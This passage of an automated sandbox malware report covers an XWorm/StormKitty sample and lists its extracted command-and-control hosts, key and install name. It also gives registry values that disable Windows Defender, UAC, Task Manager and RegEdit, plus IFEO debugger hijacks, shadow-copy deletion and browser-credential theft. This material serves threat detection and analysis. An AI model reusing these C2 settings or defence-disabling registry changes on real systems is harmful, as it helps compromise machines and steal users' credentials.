Resubmissions
23-02-2025 11:56
250223-n4c5xswmd1 323-02-2025 11:22
250223-ngvrfsvmds 1023-02-2025 09:27
250223-leqzda1rcr 822-02-2025 15:10
250222-skjwks1qa1 122-02-2025 15:10
250222-sj2p1askbk 1Analysis
-
max time kernel
1796s -
max time network
1797s -
platform
windows11-21h2_x64 -
resource
win11-20250218-en -
resource tags
arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-02-2025 09:38
Static task
static1
Behavioral task
behavioral1
Sample
test.txt
Resource
win11-20250218-en
General
-
Target
test.txt
-
Size
18B
-
MD5
5b3f97d48c8751bd031b7ea53545bdb6
-
SHA1
88be3374c62f23406ec83bb11279f8423bd3f88d
-
SHA256
d8fce9dd9c65ca143343f7711859a7cffc3c5e656a8b84108183fb769a12ed8b
-
SHA512
ed2de1eec50310ced4bde8ef6ae4b7902920b007df7b6aeb200cfe9fcc0d36ef05af7526c4675be2feac52831668798d5fe3523175efad6f6549b30f30a0b5d6
Malware Config
Extracted
xworm
printer-foundations.gl.at.ply.gg:443
printer-foundations.gl.at.ply.gg:44421:443
sadsadsd-26556.portmap.host:443
sadsadsd-26556.portmap.host:26556:443
printer-foundations.gl.at.ply.gg:1
printer-foundations.gl.at.ply.gg:44421:1
sadsadsd-26556.portmap.host:1
sadsadsd-26556.portmap.host:26556:1
printer-foundations.gl.at.ply.gg:44421
printer-foundations.gl.at.ply.gg:44421:44421
sadsadsd-26556.portmap.host:44421
sadsadsd-26556.portmap.host:26556:44421
printer-foundations.gl.at.ply.gg:26556
printer-foundations.gl.at.ply.gg:44421:26556
sadsadsd-26556.portmap.host:26556
sadsadsd-26556.portmap.host:26556:26556
-
install_file
USB.exe
Extracted
xworm
5.0
sadsadsd-26556.portmap.host:26556
4oiY4RLjbkMvhKam
-
install_file
USB.exe
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/5696-5787-0x000000001BBD0000-0x000000001BBDE000-memory.dmp disable_win_def -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/2312-2587-0x00000000005E0000-0x00000000005F6000-memory.dmp family_xworm behavioral1/memory/4232-2655-0x0000000000ED0000-0x0000000000EE4000-memory.dmp family_xworm behavioral1/memory/5696-2694-0x0000000000BC0000-0x0000000000BD8000-memory.dmp family_xworm behavioral1/memory/556-4926-0x0000000000910000-0x0000000000922000-memory.dmp family_xworm behavioral1/memory/7092-5280-0x0000000000560000-0x000000000056E000-memory.dmp family_xworm -
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/5696-2806-0x000000001CB60000-0x000000001CC7E000-memory.dmp family_stormkitty -
Stormkitty family
-
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Xworm family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies boot configuration data using bcdedit 1 TTPs 25 IoCs
pid Process 444 bcdedit.exe 1344 bcdedit.exe 648 bcdedit.exe 3244 bcdedit.exe 7156 bcdedit.exe 6184 bcdedit.exe 2824 bcdedit.exe 7032 bcdedit.exe 5692 bcdedit.exe 6924 bcdedit.exe 3328 bcdedit.exe 2928 bcdedit.exe 5216 bcdedit.exe 5684 bcdedit.exe 6004 bcdedit.exe 6568 bcdedit.exe 6980 bcdedit.exe 2108 bcdedit.exe 4552 bcdedit.exe 3680 bcdedit.exe 2260 bcdedit.exe 2632 bcdedit.exe 6384 bcdedit.exe 5024 bcdedit.exe 6188 bcdedit.exe -
Blocks application from running via registry modification 1 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" reg.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 6 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup\ = "OpenVPN 2.6.13-I001 amd64" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup\Version = "1" MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup\IsInstalled = "1" MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup\DontAsk = "2" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup\StubPath = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v OPENVPN-GUI /t REG_SZ /d \"C:\\Program Files\\OpenVPN\\bin\\openvpn-gui.exe\"" MsiExec.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\>OpenVPN_UserSetup MsiExec.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 9 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\SET584.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET584.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\wintun.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\SETCD7.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\ovpn-dco.sys DrvInst.exe File opened for modification C:\Windows\System32\drivers\SET91E.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET91E.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETCD7.tmp DrvInst.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "cmd.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\Windows\\System32\\svchost.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "cmd.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "cmd.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "cmd.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\Windows\\System32\\svchost.exe" reg.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 5796 net.exe 7036 net1.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1812 netsh.exe -
Stops running service(s) 4 TTPs
-
Executes dropped EXE 27 IoCs
pid Process 2404 openvpnserv.exe 4380 openvpnserv2.exe 5184 openvpn-gui.exe 6004 openvpn.exe 1036 playit.exe 564 openvpn.exe 5624 XWormLoader 5.1 x64.exe 2312 XClient.exe 5688 XClient.exe 4232 XClient2.exe 5696 XClient3.exe 6100 playit.exe 6108 XClient3.exe 556 XClient4.exe 3576 qwadvk.exe 5488 qwadvk.exe 5864 XClient4.exe 5284 XClient3.exe 6996 XClient4.exe 7092 portmap.exe 6220 XClient3.exe 5840 playit.exe 5272 XClient3.exe 6108 XClient4.exe 6284 portmap.exe 2816 XClient.exe 1384 XClient2.exe -
Loads dropped DLL 26 IoCs
pid Process 4592 MsiExec.exe 4592 MsiExec.exe 5652 MsiExec.exe 5652 MsiExec.exe 5652 MsiExec.exe 5652 MsiExec.exe 4996 MsiExec.exe 4996 MsiExec.exe 4996 MsiExec.exe 4996 MsiExec.exe 4996 MsiExec.exe 2404 openvpnserv.exe 4996 MsiExec.exe 4996 MsiExec.exe 5652 MsiExec.exe 4592 MsiExec.exe 6004 openvpn.exe 6004 openvpn.exe 6004 openvpn.exe 6004 openvpn.exe 564 openvpn.exe 564 openvpn.exe 564 openvpn.exe 564 openvpn.exe 5624 XWormLoader 5.1 x64.exe 5488 qwadvk.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/5624-2484-0x0000020B793D0000-0x0000020B79D22000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\OpenVPN-GUI = "C:\\Program Files\\OpenVPN\\bin\\openvpn-gui.exe" msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs
flow ioc 741 portmap.io 801 portmap.io 106 portmap.io 111 portmap.io 494 pastebin.com 535 portmap.io 962 pastebin.com 108 portmap.io 109 portmap.io 110 portmap.io 167 portmap.io 800 portmap.io 994 pastebin.com 330 pastebin.com 82 portmap.io 168 portmap.io 253 portmap.io 254 portmap.io 326 portmap.io 328 pastebin.com 331 pastebin.com 107 portmap.io 407 portmap.io 492 portmap.io 534 portmap.io 694 portmap.io 740 portmap.io -
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
flow ioc pid Process 57 https://try.abtasty.com/cross-domain-iframe.html 3120 chrome.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\netwtw10.inf_amd64_3b49c2812809f919\netwtw10.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\rtucx21x64.inf_amd64_d70642620058e2a4\rtucx21x64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netvwifimp.inf_amd64_bfb9fd6f3a078899\netvwifimp.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtwlans.inf_amd64_97cd1a72c2a7829c\netrtwlans.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8}\SETFCEB.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\usb4p2pnetadapter.inf_amd64_a9fd59ce64f17c8a\usb4p2pnetadapter.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netv1x64.inf_amd64_30040c3eb9d7ade4\netv1x64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netvf63a.inf_amd64_a090e6cfaf18cb5c\netvf63a.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netwns64.inf_amd64_162bb49f925c6463\netwns64.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{702b386a-fb91-4945-a705-dc5a33ba8fb1}\SET268.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\usbnet.inf_amd64_5229ee1dac1c624e\usbnet.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\nett4x64.inf_amd64_54eacac1858c78ab\nett4x64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netl1e64.inf_amd64_8d5ca5ab1472fc44\netl1e64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\net44amd.inf_amd64_450d4b1e35cc8e0d\net44amd.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\net9500-x64-n650f.inf_amd64_e92c5a65e41993f9\net9500-x64-n650f.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\rtwlanu_oldic.inf_amd64_1a82423cc076e882\rtwlanu_oldic.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netl1c63x64.inf_amd64_4d6630ce07a4fb42\netl1c63x64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtwlanu.inf_amd64_1815bafd14dc59f0\netrtwlanu.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_ba3e477187f1080b\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netelx.inf_amd64_7812e4e45c4a5eb1\netelx.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netjme.inf_amd64_752bf22f1598bb7e\netjme.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netimm.inf_amd64_8b2087393aaef952\netimm.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{f14b3064-c501-fc41-ad28-96fae3a12739}\SET363.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\ovpn-dco.inf_amd64_b737bb7e846ccda6\ovpn-dco.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netmyk64.inf_amd64_1f949c30555f4111\netmyk64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netathrx.inf_amd64_220db23f5419ea8d\netathrx.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netr7364.inf_amd64_310ee0bc0af86ba3\netr7364.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8}\SETFCD9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{702b386a-fb91-4945-a705-dc5a33ba8fb1}\SET269.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netwtw06.inf_amd64_2edd50e7a54d503b\netwtw06.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\e2xw10x64.inf_amd64_04c2ae40613a06ff\e2xw10x64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\net8187se64.inf_amd64_99a4ca261f585f17\net8187se64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\netg664.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{702b386a-fb91-4945-a705-dc5a33ba8fb1}\SET269.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netefe3e.inf_amd64_7830581a689ef40d\netefe3e.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netl160a.inf_amd64_e4cbe375963a69e9\netl160a.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\usbncm.inf_amd64_6686e5d9c8b063ef\usbncm.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_ba3e477187f1080b\OemVista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netwbw02.inf_amd64_1c4077fa004e73b4\netwbw02.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netwew01.inf_amd64_153e01d761813df2\netwew01.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netwtw08.inf_amd64_62f41b89e0dc2537\netwtw08.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\net8192se64.inf_amd64_167684f9283b4eca\net8192se64.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8}\wintun.sys DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{f14b3064-c501-fc41-ad28-96fae3a12739}\SET352.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\rndiscmp.inf_amd64_04b60d124553a40f\rndiscmp.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8}\SETFCD9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8} DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\net1yx64.inf_amd64_8604d8a50804b9c1\net1yx64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_amd64_d54f628acb9dea33\dc21x4vm.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\net8192su64.inf_amd64_66c8bfc7a4b1feed\net8192su64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netbxnd0a.inf_amd64_777881a2c4c0272c\netbxnd0a.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\mrvlpcie8897.inf_amd64_07fc330c5a5730ca\mrvlpcie8897.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{702b386a-fb91-4945-a705-dc5a33ba8fb1}\SET267.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\net7800-x64-n650f.inf_amd64_178f1bdb49a6e2fd\net7800-x64-n650f.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netnvma.inf_amd64_7080f6b8ea1744fb\netnvma.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netwlv64.inf_amd64_0b9818131664d91e\netwlv64.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_49825a4c00258135\kdnic.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{35795658-0e1e-f74f-981a-abbd46aec4d8}\SETFCDA.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{702b386a-fb91-4945-a705-dc5a33ba8fb1}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{f14b3064-c501-fc41-ad28-96fae3a12739}\ovpn-dco.cat DrvInst.exe -
Drops file in Program Files directory 30 IoCs
description ioc Process File created C:\Program Files\Common Files\ovpn-dco\Win11\ovpn-dco.sys msiexec.exe File created C:\Program Files\OpenVPN\res\ovpn.ico msiexec.exe File created C:\Program Files\OpenVPN\include\tap-windows.h msiexec.exe File created C:\Program Files\playit_gg\bin\playit.exe msiexec.exe File created C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll msiexec.exe File created C:\Program Files\OpenVPN\log\README.txt msiexec.exe File created C:\Program Files\OpenVPN\doc\openvpn.8.html msiexec.exe File created C:\Program Files\Common Files\ovpn-dco\Win11\ovpn-dco.inf msiexec.exe File created C:\Program Files\OpenVPN\config\README.txt msiexec.exe File created C:\Program Files\OpenVPN\bin\openvpnserv2.exe msiexec.exe File created C:\Program Files\OpenVPN\bin\tapctl.exe msiexec.exe File created C:\Program Files\OpenVPN\bin\openvpn-plap-install-new.reg MsiExec.exe File created C:\Program Files\OpenVPN\bin\libopenvpn_plap.dll msiexec.exe File created C:\Program Files\OpenVPN\bin\openvpn-plap-install.reg msiexec.exe File created C:\Program Files\OpenVPN\license.txt msiexec.exe File created C:\Program Files\OpenVPN\sample-config\client.ovpn msiexec.exe File created C:\Program Files\OpenVPN\ssl\modules\legacy.dll msiexec.exe File created C:\Program Files\OpenVPN\sample-config\server.ovpn msiexec.exe File created C:\Program Files\OpenVPN\bin\vcruntime140.dll msiexec.exe File created C:\Program Files\OpenVPN\bin\openvpn-plap-uninstall.reg msiexec.exe File created C:\Program Files\OpenVPN\bin\openvpnserv.exe msiexec.exe File opened for modification \??\c:\program files\openvpn\res\ovpn.ico openvpn-gui.exe File created C:\Program Files\OpenVPN\bin\openvpn-gui.exe msiexec.exe File created C:\Program Files\OpenVPN\config-auto\README.txt msiexec.exe File opened for modification \??\c:\program files\openvpn\res\ovpn.ico chrome.exe File created C:\Program Files\OpenVPN\bin\openvpn.exe msiexec.exe File created C:\Program Files\OpenVPN\bin\libcrypto-3-x64.dll msiexec.exe File created C:\Program Files\OpenVPN\doc\INSTALL-win32.txt msiexec.exe File created C:\Program Files\OpenVPN\bin\libssl-3-x64.dll msiexec.exe File created C:\Program Files\Common Files\ovpn-dco\Win11\ovpn-dco.cat msiexec.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIFE57.tmp msiexec.exe File opened for modification C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\openvpn.ico msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\SystemTemp\~DF2D4F89C34E9AEE46.TMP msiexec.exe File created C:\Windows\Installer\e58eb87.msi msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Installer\MSIF142.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\tapctl_create.ico msiexec.exe File opened for modification C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\openvpn.ico Taskmgr.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Installer\MSIF1D0.tmp msiexec.exe File opened for modification C:\Windows\Installer\{8C17366B-843B-49DC-AC1B-748DC264E06F}\ProductICO Taskmgr.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF1E1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF191.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem4.inf DrvInst.exe File created C:\Windows\SystemTemp\~DFE5714696180E668A.TMP msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\inf\oem3.inf DrvInst.exe File created C:\Windows\Installer\{8C17366B-843B-49DC-AC1B-748DC264E06F}\ProductICO msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\inf\oem4.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI16C4.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF31CEACA11EEC03D9.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF655BC98C9E4AAE42.TMP msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\openvpn.ico msiexec.exe File opened for modification C:\Windows\Installer\{8C17366B-843B-49DC-AC1B-748DC264E06F}\ProductICO Taskmgr.exe File opened for modification C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\openvpn.ico Taskmgr.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Installer\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\tapctl_create.ico msiexec.exe File created C:\Windows\Installer\e58eb86.msi msiexec.exe File created C:\Windows\Installer\e58eb89.msi msiexec.exe File created C:\Windows\SystemTemp\~DF5B5679AAE606C48E.TMP msiexec.exe File opened for modification 